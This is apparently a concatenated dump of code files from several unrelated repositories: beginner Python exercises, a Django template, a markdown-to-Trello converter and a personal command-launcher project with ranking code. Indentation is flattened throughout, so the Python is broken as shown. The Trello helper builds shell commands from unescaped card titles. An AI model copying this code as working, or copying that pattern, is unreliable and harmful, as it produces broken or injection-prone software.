total_height = 0
#Goes through the list of heights
for height in student_heights:
#Adds one to the count
students_count += 1
#Adds the height to the total
total_height += height
#Computes the average height
avg_height = round(total_height / students_count)
#Prints the average height
print(avg_height)
#Write your code above this line 👆
# 🚨 Do NOT modify the code below this line 👇
with open('testing_copy.py', 'w') as file:
file.write('def test_func():\n')
with open('main.py', 'r') as original:
f2 = original.readlines()[0:40]
for x in f2:
file.write(" " + x)
import testing_copy
import unittest
from unittest.mock import patch
from io import StringIO
import os
class MyTest(unittest.TestCase):
def run_test(self, given_answer, expected_print):
with patch('builtins.input', return_value=given_answer), patch('sys.stdout', new=StringIO()) as fake_out:
testing_copy.test_func()
self.assertEqual(fake_out.getvalue(), expected_print)
def test_1(self):
self.run_test(given_answer='180 124 165 173 189 169 146', expected_print='164\n')
def test_2(self):
self.run_test(given_answer='150 142 185 120 171 184 149 199', expected_print='162\n')
def test_3(self):
self.run_test(given_answer='24 59 68', expected_print='50\n')
print("\n\n\n.\n.\n.")
print('Checking that your code prints a single number - the average height - rounded to the nearest integer for several different lists of heights.\n')
print('\nRunning some tests on your code:')
print(".\n.\n.")
unittest.main(verbosity=1, exit=False)
os.remove("testing_copy.py")
```
#### File: day-8-1-exercise/test-your-code/main.py
```python
from math import ceil
#Defines the function paint_calc with 3 parameters : height of the wall, width of the wall and coverage
def paint_calc(height, width, cover):
#Computes the number of cans needed
cans_number = ceil(height * width / cover)
#Prints the result
print(f"You'll need {cans_number} cans of paint.")
#Write your code above this line 👆
# 🚨 Don't change the code below 👇
test_h = int(input("Height of wall: "))
test_w = int(input("Width of wall: "))
coverage = 5
paint_calc(height=test_h, width=test_w, cover=coverage)
# Tests
import unittest
from unittest.mock import patch
from io import StringIO
class MyTest(unittest.TestCase):
# Testing Print output
def test_1(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(3, 6, 5)
expected_print = "You'll need 4 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
def test_2(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(3, 9, 5)
expected_print = "You'll need 6 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
def test_3(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(7, 9, 2)
expected_print = "You'll need 32 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
def test_4(self):
with patch('sys.stdout', new = StringIO()) as fake_out:
paint_calc(12, 45, 5)
expected_print = "You'll need 108 cans of paint.\n"
self.assertEqual(fake_out.getvalue(), expected_print)
print("\n")
print('Running some tests on your code:')
print(".\n.\n.\n.")
unittest.main(verbosity=1, exit=False)
```
#### File: Day 8/day-8-2-exercise/main.py
```python
def prime_checker(number):
#Initializes the variable storing the result
prime = True
#Goes through all the numbers from 2 to the tested number - 1
for i in range(2, number):
#Tests if the tested number is divisible by the current number
if number % i == 0:
#As the tested number is divisible by the current number, it's not a prime number
prime = False
#Prints whether the number is prime or not depending on the value of the variable prime
if prime:
print("It's a prime number.")
else:
print("It's not a prime number.")
#Write your code above this line 👆
#Do NOT change any of the code below👇
n = int(input("Check this number: "))
prime_checker(number=n)
```
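The loop above tries every candidate divisor up to number - 1. As a side note, a common refinement stops at the square root and returns early; the sketch below illustrates this and is not part of the original exercise:
```python
from math import isqrt

def prime_checker_fast(number):
    # 0 and 1 are not prime by definition
    if number < 2:
        return False
    # A composite number always has a divisor no larger than its square root
    for i in range(2, isqrt(number) + 1):
        if number % i == 0:
            return False
    return True
```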
#### File: Day 9/day-9-2-exercise/main.py
```python
travel_log = [
{
"country": "France",
"visits": 12,
"cities": ["Paris", "Lille", "Dijon"]
},
{
"country": "Germany",
"visits": 5,
"cities": ["Berlin", "Hamburg", "Stuttgart"]
},
]
#🚨 Do NOT change the code above
#TODO: Write the function that will allow new countries
#to be added to the travel_log. 👇
#Defining a function adding a new country to the travel log
def add_new_country(country, visits, cities):
#Creating a Dictionary for the country using arguments
country = {
"country": country,
"visits": visits,
"cities": cities
}
#Adding the country to the travel log
travel_log.append(country)
#🚨 Do not change the code below
add_new_country("Russia", 2, ["Moscow", "Saint Petersburg"])
print(travel_log)
```
|
{
"source": "jeanbrag/intro-programming",
"score": 4
}
|
#### File: jeanbrag/intro-programming/lista1.py
```python
# Exercise 1: Define the function intersec(x1,y1,x2,y2,x3,y3,x4,y4) that succeeds if, in the Cartesian plane,
# there is an intersection between two rectangles defined by their top-left and bottom-right points: (x1,y1) and (x2,y2)
# for the first rectangle and (x3,y3) and (x4,y4) for the second.
def intersec(x1,y1,x2,y2,x3,y3,x4,y4):
return intersecx(x1,x2,x3,x4) and intersecy(y1,y2,y3,y4)
# Two x-intervals overlap iff each one starts before the other ends;
# this also covers the case where one rectangle fully contains the other
def intersecx(x1,x2,x3,x4):
return x3 <= x2 and x4 >= x1
# For y the top-left value is the larger one, so the test is mirrored
def intersecy(y1,y2,y3,y4):
return y3 >= y2 and y4 <= y1
# Exercise 2: An international phone call is billed as follows: the minimum charge is R$5,
# which covers a call of up to 5 minutes. When the duration is up to 10 minutes, R$7 are charged.
# Calls longer than 10 minutes pay R$1 per additional minute (added to the initial R$7).
# Define the function tarifa(m) that returns the cost of a call lasting m minutes.
# For example:
# >>> tarifa(12)
# 9
def tarifa(m):
if m<0: return False
if m<=5: return 5
elif m<=10: return 7
else: return 7+(m-10)
# Exercise 3: A die-hard fan wants to make a "stylized" Brazilian flag to use during the 2016 Olympic games.
# He already has the exact amounts of green and blue fabric and needs to know how many meters of yellow fabric to buy.
# Compute the amount of yellow fabric (in square meters), considering that the flag lies in the Cartesian plane
# and that we know the top-left (x1, y1) and bottom-right (x2, y2) points.
from math import *
def pano_amarelo(x1,y1,x2,y2):return area_quad(y1,y2)-area_circ(y1,y2)
def quad(x):return x*x
def lado_quad(y1,y2):return sqrt(area_quad(y1,y2))
def area_quad(y1,y2):return (quad(abs(y1-y2)))/2
def raio (x):return (x)/2
def area_circ(y1,y2):return pi*(quad(raio(lado_quad(y1,y2))))
```
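A quick sanity check of Exercise 3: the yellow area is the diamond minus the inscribed circle. The corner points below are illustrative assumptions, not values from the exercise:
```python
# Worked example (assumed corners): top-left (0, 2), bottom-right (4, -2)
# area_quad = |2 - (-2)|**2 / 2 = 8.0          (yellow diamond)
# lado_quad = sqrt(8) ~ 2.828                  (side of the equivalent square)
# area_circ = pi * (2.828 / 2)**2 ~ 6.283      (blue circle)
print(pano_amarelo(0, 2, 4, -2))  # ~ 1.717 square meters of yellow fabric
```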
|
{
"source": "jeancahu/django_project_template",
"score": 2
}
|
#### File: django_project_template/index/views.py
```python
from django.shortcuts import render
from django.views.decorators.http import require_GET
# Create your views here.
@require_GET
def index(request):
context={
}
return render(request, 'index.html', context)
```
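For context, a minimal URLconf that wires up this view could look like the sketch below; the `index` module path is an assumption based on the file layout shown here:
```python
# Hypothetical project urls.py (module names are assumptions)
from django.urls import path

from index import views

urlpatterns = [
    # Route the site root to the GET-only index view above
    path('', views.index, name='index'),
]
```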
|
{
"source": "jeancahu/GTFS_shapes_editor_JS",
"score": 2
}
|
#### File: src/shapeeditor/admin.py
```python
from django.contrib import admin
from .models import History, Shape, Stop
from django.urls import reverse
# Register your models here.
@admin.register(History)
class SEHistory(admin.ModelAdmin):
list_display = ('pk', 'history_id', 'history_date')
list_display_links = ('history_id',)
ordering = ('-pk',)
search_fields = ('history_id', 'history_date')
fieldsets = (
('History Information', {
'description':
"History saved in data base from Shapeeditor, \
click on \"view on site\" to edit from this version",
'fields': ('history_id',),
}),
)
def view_on_site(self, obj):
url = reverse('shapeeditor', kwargs={'history_id': obj.pk})
return url
@admin.register(Shape)
class SEShape(admin.ModelAdmin):
pass
@admin.register(Stop)
class SEStop(admin.ModelAdmin):
pass
```
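The view_on_site override above relies on a URL pattern named shapeeditor that accepts a history_id; a matching URLconf entry might look like this sketch (the view callable is an assumption, not shown in this excerpt):
```python
# Hypothetical URLconf entry matching reverse('shapeeditor', kwargs={'history_id': obj.pk})
from django.urls import path

from shapeeditor import views  # assumed module layout

urlpatterns = [
    path('shapeeditor/<int:history_id>/', views.editor, name='shapeeditor'),
]
```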
#### File: src/shapeeditor/models.py
```python
from django.db import models
# Create your models here.
def default_empty_json(): # TODO
return {}
def default_stop_line(): # TODO
return {'id': [], 'points': [], 'distances': []}
def default_shape_line():
return {'id': [], 'points': [], 'distances': []}
# models
class History (models.Model):
"""
Commands succession to reach a desired state in the editor frontend
"""
history_id = models.CharField(
max_length=80)
history_date = models.DateTimeField(
# Time and date the history was upload
auto_now_add = True,
editable = False,
blank = False
)
history_json = models.JSONField( # TODO: add default
blank = False,
editable = False
)
class Meta:
verbose_name = "History"
verbose_name_plural = "Histories"
def __str__(self):
return '{} - {} ({})'.format(
self.pk,
self.history_id,
self.history_date.strftime("%Y-%m-%d"))
class Stop (models.Model):
"""
Stop, a node near some waypoint in the shape
"""
stop_id = models.CharField(
primary_key=True, # This makes the id unique in database
db_index=True,
max_length=80)
lines = models.JSONField(default=default_stop_line) # TODO replace with multiple fields
def __str__(self):
return self.stop_id
class Shape (models.Model):
"""
Shape has a unique ID of type string, an array of geocoordinates, and an
equivalent 1:1 array of integral distances (distance from the first endpoint)
"""
shape_id = models.CharField(
primary_key=True, # This makes the id unique in database
db_index=True,
max_length=80)
lines = models.JSONField(default=default_shape_line)
def __str__(self):
return self.shape_id
```
|
{
"source": "jeanCarloMachado/markdown_to_trello",
"score": 3
}
|
#### File: markdown_to_trello/markdown_to_trello/markdown_to_trello.py
```python
import os
from typing import List, Optional
from markdown_to_trello.tree_parser import TreeParser
from functools import reduce
import re
class MarkdownToTrello:
def __init__(self, text):
self.text = text
def convert_to_cards(self) -> List['Card']:
cards: List['Card'] = []
parsed_tree = TreeParser().parse(self.text)
for node in parsed_tree:
description = ''
if node.get('nested'):
lines = list(map(lambda x: x['text'], node['nested']))
description = '\n'.join(lines)
cards.append(Card(node['text'], description))
return cards
def _line_empty(self, line: str) -> bool:
return not re.search(".*[A-Za-z0-9]+.*", line)
class Card:
def __init__(self, title, description = ""):
# remove empty spaces in front and the minus of a list
title = re.sub("^\s*- ", '', title)
self.title = title
self.description = description
Command = str
class SaveCards:
def __init__(self, board, lane):
self.board = board
self.lane = lane
def dry_run(self, cards: List['Card']) -> List[Command]:
position = 'top'
commands = []
# reverse so that inserting each card at the top keeps the original order
cards = reversed(cards)
for card in cards:
title = card.title
description = card.description
commands.append(f'trello add-card -b "{self.board}" -l "{self.lane}" "{title}" "{description}" -q {position}')
return commands
def perform(self, cards: List['Card']):
commands = self.dry_run(cards)
for command in commands:
os.system(command)
```
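Keeping dry_run separate from perform makes command generation side-effect free and easy to inspect. A minimal usage sketch, assuming a configured `trello` CLI on the PATH:
```python
# Minimal sketch: preview the generated commands before executing them
text = "- Buy milk\n  - oat\n  - whole\n- Do laundry"
cards = MarkdownToTrello(text).convert_to_cards()
saver = SaveCards("Groceries", "Inbox")
for command in saver.dry_run(cards):
    print(command)       # inspect first...
# saver.perform(cards)   # ...then actually create the cards
```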
#### File: markdown_to_trello/tests/test_markdown_to_trello.py
```python
import unittest
from markdown_to_trello.markdown_to_trello import MarkdownToTrello, SaveCards, Card
import pytest
class ConverterTest(unittest.TestCase):
def test_simplest(self):
text = 'Do groceries'
cards = MarkdownToTrello(text).convert_to_cards()
self.assertTrue(len(cards), 1)
self.assertEqual(cards[0].title, 'Do groceries')
def test_list_remove_symbol(self):
text = "- Do groceries"
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
def test_multiple_lines_multiple_cards(self):
text = "- Do groceries\n- Do laundry"
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
self.assertEqual(cards[1].title, 'Do laundry')
def test_empty_line_no_card(self):
text = """
"""
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards, [])
def test_ignore_identation_of_siblings(self):
text = """
- Do groceries
- Do laundry
"""
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
self.assertEqual(cards[1].title, 'Do laundry')
def test_list_with_description(self):
text = """
- Do groceries
- avocado
- laranja
- Do laundry
"""
cards = MarkdownToTrello(text).convert_to_cards()
self.assertEqual(cards[0].title, 'Do groceries')
self.assertEqual(cards[0].description, ' - avocado\n - laranja')
self.assertEqual(cards[1].title, 'Do laundry')
class SaveTest(unittest.TestCase):
def test_save(self):
result = SaveCards('Myboard','Inbox').dry_run([
Card('buy milk', "my description"),
Card('clean clothes'),
])
self.assertEqual(result[1], 'trello add-card -b "Myboard" -l "Inbox" "buy milk" "my description" -q top')
self.assertEqual(result[0], 'trello add-card -b "Myboard" -l "Inbox" "clean clothes" "" -q top')
```
|
{
"source": "jeanCarloMachado/PythonSearch",
"score": 3
}
|
#### File: search_run/apps/terminal.py
```python
import logging
import os
class Terminal:
""" Terminal abstraction for search run """
DEFAULT_TITLE = "SearchRunTerminal"
@staticmethod
def run_command(cmd) -> bool:
""" runs a shell command raise an exception on failure """
message = f'=> Command to run: "{cmd}"'
logging.debug(message)
result = os.system(cmd)
success = result == 0
return success
def wrap_cmd_into_terminal(
self, cmd, title=None, hold_terminal_open_on_end=True
) -> str:
"""
wraps the command in a terminal but does not execute it
"""
if hold_terminal_open_on_end:
cmd = f" {cmd}"
final_cmd = f'kitty -T "{title}" bash -c "{cmd}" '
return final_cmd
```
#### File: PythonSearch/search_run/base_configuration.py
```python
from __future__ import annotations
import inspect
import os
from typing import List, Optional
from search_run.features import FeaturesSupport
class EntriesGroup:
"""
Main configuration of the application. Customers are supposed to pass their own
"""
# the location of the dumped index
commands: dict = {}
def aggregate_commands(self, commands_classes):
"""
aggregates a list of classes or instances
"""
for class_i in commands_classes:
is_class = inspect.isclass(class_i)
instance = class_i() if is_class else class_i
if isinstance(instance, EntriesGroup):
cmd_items = instance.get_hydrated_commands()
else:
cmd_items = instance.commands
self.commands = {**self.commands, **cmd_items}
def get_command(self, given_key):
""" Returns command value based on the key name, must match 11"""
given_key = given_key.lower()
for key, value in self.commands.items():
if key.lower() == given_key:
return value
raise Exception(f"Value not found for key: {given_key}")
def get_keys(self):
keys = []
for key, value in self.commands.items():
keys.append(key)
return keys
def get_hydrated_commands(self):
result = {}
for key, command in self.commands.items():
if type(command) is dict:
if "tags" not in command:
command["tags"] = [self.__class__.__name__]
else:
command["tags"].append(self.__class__.__name__)
result[key] = command
return result
def get_source_file(self):
"""Returns the path of the source code where the config is stored"""
import sys
return sys.argv[0]
def get_project_root(self):
"""
Returns the root of the project where the config is
        @todo substitute PROJECT_ROOT with this
"""
source = self.get_source_file()
path = os.path.dirname(source)
# always go 1 path up
return path
class PythonSearchConfiguration(EntriesGroup):
"""
The main configuration of Python Search
    Everything to customize about the application should be tunneled through this class
"""
APPLICATION_TITLE = 'PythonSearch - Search'
commands: dict
def __init__(
self,
*,
entries: Optional[dict] = None,
entries_groups: Optional[List[EntriesGroup]] = None,
supported_features: Optional[FeaturesSupport] = None,
):
if entries:
self.commands = entries
if entries_groups:
self.aggregate_commands(entries_groups)
if supported_features:
self.supported_features = supported_features
else:
self.supported_features = FeaturesSupport.default()
```
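A minimal sketch of how a user configuration could plug into the classes above (the entries are invented for illustration):

```python
class MyEntries(EntriesGroup):
    commands = {
        "open mail": {"url": "https://mail.example.com"},
        "say hi": {"cmd": "echo hi"},
    }

config = PythonSearchConfiguration(entries_groups=[MyEntries])
print(config.get_keys())                # ['open mail', 'say hi']
print(config.get_command("Open Mail"))  # lookup is case-insensitive
# every hydrated entry also gets tagged with its group class name: ['MyEntries']
```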
#### File: PythonSearch/search_run/cli.py
```python
from search_run.apps.window_manager import I3
from search_run.base_configuration import PythonSearchConfiguration
from search_run.entry_runner import EntryRunner
def error_handler(e):
from search_run.observability.logger import initialize_systemd_logging
logging = initialize_systemd_logging()
import sys
import traceback
exc_info = sys.exc_info()
    logging.warning(
        f"Unhandled exception: {e}\n" + "".join(traceback.format_exception(*exc_info))
    )
raise e
class PythonSearchCli:
"""
The command line application, entry point of the program.
Try to avoid adding direct commands, prefer instead to add objects as parts of functions
"""
configuration: PythonSearchConfiguration
@staticmethod
def setup_from_config(config: PythonSearchConfiguration):
try:
instance = PythonSearchCli(config)
import fire
fire.Fire(instance)
except BaseException as e:
error_handler(e)
def __init__(self, configuration: PythonSearchConfiguration = None):
"""
        Keep this constructor small and import dependencies inside the functions
so they keep being fast
"""
self.configuration = configuration
self.run_key = EntryRunner(configuration).run_key
def search(self):
"""Main entrypoint of the application"""
from search_run.search_ui.search import Search
Search(self.configuration).run()
def clipboard_key(self, key):
"""
Copies the content of the provided key to the clipboard.
Used by fzf to provide Ctrl-c functionality.
"""
from search_run.interpreter.interpreter import Interpreter
Interpreter.build_instance(self.configuration).clipboard(key)
def edit_key(self, key):
from search_run.entry_capture.edit_content import EditKey
return EditKey(self.configuration).edit_key(key, dry_run=False)
def register_clipboard(self):
from search_run.entry_capture.register_new import RegisterNew
return RegisterNew(self.configuration).infer_from_clipboard()
def register_snippet_clipboard(self):
from search_run.entry_capture.register_new import RegisterNew
return RegisterNew(self.configuration).snippet_from_clipboard()
def register_new(self):
from search_run.entry_capture.register_new import RegisterNew
return RegisterNew(self.configuration)
def export_configuration(self):
from search_run.configuration_generator import ConfigurationGenerator
configuration_exporter = ConfigurationGenerator(self.configuration)
configuration_exporter.export()
def ranking(self):
from search_run.ranking.ranking import RankingGenerator
return RankingGenerator(self.configuration)
def consumers(self):
"""Provides access to the event consumers"""
from search_run.events.latest_used_entries import LatestUsedEntries
class Consumers:
def latest_used_entries(self):
LatestUsedEntries().consume()
return Consumers()
def features(self):
from search_run.features import FeatureToggle
return FeatureToggle()
def _utils(self):
"""Here commands that are small topics and dont fit the rest"""
class Utils:
def __init__(self, configuration):
self.configuration = configuration
def hide_launcher(self):
"""hide the search launcher -i2 specific"""
I3().hide_window(self.configuration.APPLICATION_TITLE)
return Utils(self.configuration)
```
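A sketch of the entry-point script a user would write on top of this CLI (the entries dict is hypothetical):

```python
from search_run.base_configuration import PythonSearchConfiguration
from search_run.cli import PythonSearchCli

config = PythonSearchConfiguration(
    entries={"open home": {"url": "https://example.com"}}
)

if __name__ == "__main__":
    # fire turns every public method (search, edit_key, ...) into a subcommand
    PythonSearchCli.setup_from_config(config)
```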
#### File: PythonSearch/search_run/context.py
```python
import os
class Context:
"""
    captures information from the environment
to contextualize how to execute the command
"""
_instance = None
_is_cli: bool = False
_is_group_command = False
_should_execute_sequentially = False
_input = None
@staticmethod
def get_instance():
if not Context._instance:
Context._instance = Context()
return Context._instance
def is_cli(self):
if os.environ.get("DISABLE_CLI"):
return False
return self._is_cli
def enable_gui_mode(self):
self._is_cli = False
return self
def enable_group_command(self):
self._is_group_command = True
return self
def is_group_command(self):
return self._is_group_command
def enable_sequential_execution(self):
self._should_execute_sequentially = True
def disable_sequential_execution(self):
self._should_execute_sequentially = False
def should_execute_sequentially(self):
return self._should_execute_sequentially
def set_interpreter(self, interpreter):
self._interpreter = interpreter
def get_interpreter(self):
return self._interpreter
def set_input(self, input):
self._input = input
def get_input(self):
return self._input
```
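The class is a process-wide singleton; a short sketch of the intended flow:

```python
context = Context.get_instance()
context.enable_group_command()
context.enable_sequential_execution()

assert context.is_group_command()
assert context.should_execute_sequentially()
assert Context.get_instance() is context  # the same instance is shared everywhere
```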
#### File: search_run/interpreter/cmd.py
```python
import logging
from grimoire.notification import send_notification
from grimoire.shell import shell
from grimoire.string import remove_special_chars
from search_run.apps.terminal import Terminal
from search_run.context import Context
from search_run.exceptions import CommandDoNotMatchException
from search_run.interpreter.base import BaseEntry
WRAP_IN_TERMINAL = "new-window-non-cli"
class CmdEntry(BaseEntry):
"""
Represents a bash command entry
"""
def __init__(self, cmd, context: Context):
self.context = context
if type(cmd) == str:
self.cmd = {WRAP_IN_TERMINAL: True, "cmd": cmd}
return
if WRAP_IN_TERMINAL in cmd and "cmd" in cmd:
self.cmd = cmd
return
if "cli_cmd" in cmd:
self.cmd = cmd
self.cmd["cmd"] = cmd["cli_cmd"]
self.cmd[WRAP_IN_TERMINAL] = True
return
if "cmd" in cmd:
self.cmd = cmd
return
raise CommandDoNotMatchException.not_valid_command(self, cmd)
def interpret_default(self):
if self.try_to_focus():
return
cmd = self.apply_directory(self.cmd["cmd"])
if "high_priority" in self.cmd:
cmd = f"nice -19 {cmd}"
if "directory" in self.cmd:
cmd = f'cd {self.cmd["directory"]} && {cmd}'
if "tmux" in self.cmd:
cmd = f'tmux new -s "{self._get_window_title()}" {cmd} '
if WRAP_IN_TERMINAL in self.cmd:
cmd = f"{cmd} ; tail -f /dev/null"
cmd = self._try_to_wrap_in_terminal(cmd)
logging.info(f"Command to run: {cmd}")
result = self._execute(cmd)
logging.info(f"Result finished: {result}")
return self.return_result(result)
def _try_to_wrap_in_terminal(self, cmd):
if WRAP_IN_TERMINAL in self.cmd:
logging.info("Running it in a new terminal")
cmd = Terminal().wrap_cmd_into_terminal(
cmd,
title=self._get_window_title(),
hold_terminal_open_on_end=True,
)
logging.info(f"Command to run: {cmd}")
return cmd
def _get_window_title(self):
if "window_title" in self.cmd:
return self.cmd["window_title"]
title = self.cmd["cmd"]
if "focus_match" in self.cmd:
title = self.cmd["focus_match"]
return remove_special_chars(title, [" "])
def _execute(self, cmd):
logging.info(f"Command to run: {cmd}")
if (
self.context.is_group_command()
and not self.context.should_execute_sequentially()
):
return shell.run_command_no_wait(cmd)
if self.context.should_execute_sequentially():
return shell.run_with_result(cmd)
return shell.run(cmd)
def return_result(self, result):
if "notify-result" in self.cmd:
send_notification(result)
return result
def copiable_part(self):
return self.cmd["cmd"]
```
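The constructor normalizes several entry shapes into one dictionary; a sketch of the accepted inputs (Context obtained the simplest way possible):

```python
from search_run.context import Context

ctx = Context.get_instance()

# a bare string is promoted to a terminal-wrapped command
print(CmdEntry("htop", ctx).cmd)
# {'new-window-non-cli': True, 'cmd': 'htop'}

# a cli_cmd entry is copied into cmd and flagged for terminal wrapping
print(CmdEntry({"cli_cmd": "ranger"}, ctx).cmd)
# {'cli_cmd': 'ranger', 'cmd': 'ranger', 'new-window-non-cli': True}

# a plain cmd entry is taken as-is
print(CmdEntry({"cmd": "echo hi"}, ctx).cmd)
# {'cmd': 'echo hi'}
```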
#### File: ranking/baseline/serve.py
```python
import datetime
import json
import logging
from typing import List
import mlflow
import numpy as np
from mlflow.entities import RunInfo
from mlflow.tracking import MlflowClient
from search_run.infrastructure.redis import get_redis_client
location = "/home/jean/projects/PySearchEntries/mlflow"
def get_ranked_keys(
disable_cache=False, day_of_week=None, week_number=None
) -> List[str]:
rank_cache = RankCache()
rank = rank_cache.get_rank()
if rank and not disable_cache:
# logging.info('Using cached rank')
return rank
model = load_trained_model()
keys_embeddings = load_precomputed_keys_embeddings()
saved_keys = keys_embeddings.keys()
embeddings = list(keys_embeddings.values())
embeddings = np.array(embeddings)
today_dataset = np.concatenate(
(date_features(len(saved_keys), day_of_week, week_number), embeddings), axis=1
)
result = model.predict(today_dataset)
result_with_key = list(zip(saved_keys, result))
sorted_list = sorted(result_with_key, key=lambda x: x[1], reverse=True)
ranked_list = [x[0] for x in sorted_list]
rank_cache.update_cache(ranked_list)
return ranked_list
def date_features(number_of_keys, day_of_week=None, week_number=None) -> np.ndarray:
"""
    generate the remaining date-related features artificially, to be concatenated into the final dataset for prediction
"""
day_of_week = (
day_of_week if day_of_week else datetime.datetime.today().isocalendar()[2]
)
week_number = (
week_number if week_number else datetime.datetime.today().isocalendar()[1]
)
day_of_week_vec = np.full((number_of_keys, 1), day_of_week)
week_number_vec = np.full((number_of_keys, 1), week_number)
return np.concatenate((week_number_vec, day_of_week_vec), axis=1)
def load_trained_model():
run = get_latest_run()
logging.debug(f"RUn id: {run.run_id}")
return mlflow.xgboost.load_model(f"runs:/{run.run_id}/model")
def load_precomputed_keys_embeddings():
uri = get_latest_run().artifact_uri
path = uri.replace("file://", "") + "/keys_embeddings.json"
logging.debug(f"Path: {path}")
with open(path, "r") as f:
keys_embeddings = json.load(f)
return keys_embeddings
def get_latest_run() -> RunInfo:
experiment_name = "baseline_rank_v0"
mlflow.set_tracking_uri(f"file:{location}")
client: MlflowClient = MlflowClient()
experiment = client.get_experiment_by_name(experiment_name)
logging.debug(f"Experiment id: {experiment.experiment_id}")
runs = client.list_run_infos(experiment_id=experiment.experiment_id)
return runs[0]
class RankCache:
def __init__(self):
self.redis = get_redis_client()
def clear(self):
return self.redis.delete("cached_rank")
def get_rank(self):
result = self.redis.get("cached_rank")
if result:
return json.loads(result)
def update_cache(self, ranked_list):
self.redis.set("cached_rank", json.dumps(ranked_list))
```
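date_features is self-contained and easy to sanity-check; for example, pretending the prediction day is the Wednesday (day 3) of ISO week 12:

```python
features = date_features(3, day_of_week=3, week_number=12)
print(features.shape)  # (3, 2): week_number column first, then day_of_week
print(features)
# [[12  3]
#  [12  3]
#  [12  3]]
```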
#### File: ranking/next_item_predictor/end2end.py
```python
import logging
import sys
from pyspark.sql.session import SparkSession
from search_run.observability.logger import initialize_logging
initialize_logging()
class EndToEnd:
def build_dataset(self):
from search_run.datasets.searchesperformed import SearchesPerformed
        logging.basicConfig(level=logging.INFO, handlers=[logging.StreamHandler(sys.stdout)])
spark = SparkSession.builder.getOrCreate()
df = SearchesPerformed(spark).load()
df.sort('timestamp', ascending=False).show()
# build pair dataset with label
import pyspark.sql.functions as F
from pyspark.sql.window import Window
## add literal column
df = df.withColumn('tmp', F.lit('toremove'))
window = Window.partitionBy('tmp').orderBy('timestamp')
df = df.withColumn('row_number', F.row_number().over(window)).sort('timestamp', ascending=False)
df = df.withColumn('previous_key', F.lag('key', 1, None).over(window)).sort('timestamp', ascending=False)
pair = df.select("key", "previous_key", 'timestamp')
grouped = pair.groupBy('key', 'previous_key').agg(F.count('previous_key').alias('times')).sort('key', 'times')
grouped.cache()
grouped.count()
## add the label
        dataset = grouped.withColumn('label', F.col('times') / F.sum('times').over(Window.partitionBy('key'))).orderBy('key')
dataset = dataset.select('key',
'previous_key',
'label')
dataset = dataset.filter("LENGTH(key) > 1")
return dataset
def baseline_mse(self, dataset):
# naive approach of setting the same as input and output, used as baseline to measure the real model against
        from sklearn.metrics import mean_squared_error
        import pyspark.sql.functions as F  # needed here too: the earlier import is local to build_dataset
# apply only to the ones with the same name in input and output
# complete dataset 8k, with the same name in input and output 150
naive = dataset.filter('key == previous_key').select('key', 'label').withColumn('baseline', F.lit(1))
pd_naive = naive.select('label', 'baseline').toPandas()
return mean_squared_error(pd_naive.label, pd_naive.baseline)
def run(self):
logging.info("End to end ranking")
dataset = self.build_dataset()
print("MSE baseline: ", self.baseline_mse(dataset))
dataset.show(n=10)
if __name__ == "__main__":
import fire
fire.Fire(EndToEnd)
```
#### File: tests/entry_capture/test_register_new.py
```python
from search_run.entry_capture.register_new import \
transform_into_anonymous_entry
def test_only_value():
input_data = "a snippet"
result = transform_into_anonymous_entry(input_data)
assert result[0].startswith("no key ")
assert result[1] == {
"snippet": "a snippet",
}
```
#### File: PythonSearch/tests/test_acronyms.py
```python
from search_run.acronyms import generate_acronym
def test_acronyms():
assert generate_acronym("groceries list page") == "glp"
assert generate_acronym("pool tech interview") == "pti"
```
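The source of generate_acronym is not included in this excerpt; a minimal sketch that satisfies both assertions would be:

```python
def generate_acronym(phrase: str) -> str:
    # first letter of every whitespace-separated word
    return "".join(word[0] for word in phrase.split())

assert generate_acronym("groceries list page") == "glp"
assert generate_acronym("pool tech interview") == "pti"
```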
#### File: PythonSearch/tests/utils.py
```python
from search_run.base_configuration import EntriesGroup
def build_config(given_commands):
class Configuration(EntriesGroup):
commands = given_commands
return Configuration()
```
|
{
"source": "jeanCarloMachado/search_run",
"score": 3
}
|
#### File: search_run/search_run/base_configuration.py
```python
from __future__ import annotations
import os
from search_run.config import DataPaths
class BaseConfiguration:
"""
Main configuration of the application. Customers are supposed to pass their own
"""
# the location of the dumped index
cached_filename: str = DataPaths.cached_configuration
commands: dict = {}
def __init__(self):
pass
def get_command(self, given_key):
""" Returns command value based on the key name, must match 11"""
given_key = given_key.lower()
for key, value in self.commands.items():
if key.lower() == given_key:
return value
raise Exception(f"Value not found for key: {given_key}")
def get_keys(self):
keys = []
for key, value in self.commands.items():
keys.append(key)
return keys
def get_hydrated_commands(self):
result = {}
for key, command in self.commands.items():
if type(command) is dict:
if "tags" not in command:
command["tags"] = [self.__class__.__name__]
else:
command["tags"].append(self.__class__.__name__)
result[key] = command
return result
def aggregate_commands(self, commands_classes):
for class_i in commands_classes:
instance = class_i()
if issubclass(class_i, BaseConfiguration):
cmd_items = instance.get_hydrated_commands()
else:
cmd_items = instance.commands
self.commands = {**self.commands, **cmd_items}
def get_cached_filename(self):
return self.cached_filename
def get_source_file(self):
"""Returns the path of the source code where the config is stored"""
import inspect
return inspect.getfile(self.__class__)
def get_project_root(self):
"""
Returns the root of the project where the config is
        @todo substitute PROJECT_ROOT with this
"""
source = self.get_source_file()
path = os.path.dirname(source)
# always go 1 path up
path = f"{path}/.."
return path
class BaseEntry(BaseConfiguration):
"""defined as a replacement of base configuration for system entry classes"""
pass
```
#### File: search_run/search_run/core_entities.py
```python
from __future__ import annotations
from enum import Enum
from typing import List, Optional
from numpy import ndarray
class Entry:
"""
    A Python dictionary we write in PythonSearch
"""
name: str
value: Optional[dict]
embedding: Optional[ndarray]
similarity_score: Optional[float]
    def __init__(self, *, name: str, value: dict = None, embedding=None):
        self.name = name
        self.value = value
        self.embedding = embedding
        self.similarity_score = None  # avoids AttributeError before a score is assigned
def has_embedding(self) -> bool:
return self.embedding is not None
def get_similarity_score(self) -> float:
""" returns a score, if none will then return 0"""
return self.similarity_score if self.similarity_score else 0.0
def serialize(self) -> str:
return f"{self.name} {self.value}"
class Ranking:
